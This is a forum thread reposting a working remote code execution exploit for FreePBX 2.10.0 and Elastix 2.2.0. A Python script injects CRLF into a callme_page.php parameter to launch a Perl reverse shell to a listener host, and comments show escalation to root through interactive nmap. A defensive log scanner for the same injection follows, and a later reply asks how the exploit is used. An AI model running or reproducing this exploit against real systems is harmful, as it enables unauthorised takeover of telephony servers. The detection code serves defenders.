The_Arhitect Posted March 24, 2012

FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit

```python
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2010
# Author: muts
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
import urllib

rhost="172.16.254.72"
lhost="172.16.254.223"
lport=443
extension="1000"

# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
```

Source: FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit
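A defender-side check for the request shown in the post above, as an added example that is not part of the original post or of the exploit author's code: it scans web-server access logs for `callme_page.php` requests whose decoded `callmenum` contains CR/LF or anything other than a dial string. The log lines are constructed, and the combined log format and the dial-string allow-list are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

TARGET_PATH = "/recordings/misc/callme_page.php"  # path taken from the post
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
DIAL_OK = re.compile(r"[0-9+*#]+")  # assumption: legitimate values are plain dial strings

# Constructed sample lines (Apache combined format); the payload is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Mar/2012:10:00:01 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [24/Mar/2012:10:02:13 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20PLACEHOLDER%0D%0A%0D%0A HTTP/1.1" 200 512 "-" "Python-urllib/1.17"',
    '10.0.0.11 - - [24/Mar/2012:10:02:50 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [24/Mar/2012:10:03:40 +0000] "GET /recordings/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def classify(value):
    """Return None for a plain dial string, otherwise a finding label."""
    if "\r" in value or "\n" in value:
        # Extra lines smuggled in after the number, as in the request in the post.
        return "crlf-injection"
    if not DIAL_OK.fullmatch(value):
        return "unexpected-characters"
    return None

def scan(lines):
    """Return (client_ip, finding, decoded_value) for each suspicious callmenum."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable access-log entry
        parts = urlsplit(m.group("target"))
        if parts.path != TARGET_PATH:
            continue
        # parse_qs percent-decodes, so %0D%0A becomes a literal CR/LF here.
        for value in parse_qs(parts.query, keep_blank_values=True).get("callmenum", []):
            finding = classify(value)
            if finding:
                findings.append((m.group("ip"), finding, value))
    return findings

if __name__ == "__main__":
    for ip, finding, value in scan(SAMPLE_LOG):
        print(ip, finding, repr(value))
```

The same allow-list, applied to `callmenum` before the application uses it, rejects the request outright instead of only flagging it afterwards.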
BloodLust Posted August 13, 2012

How is this used? Could some details be given?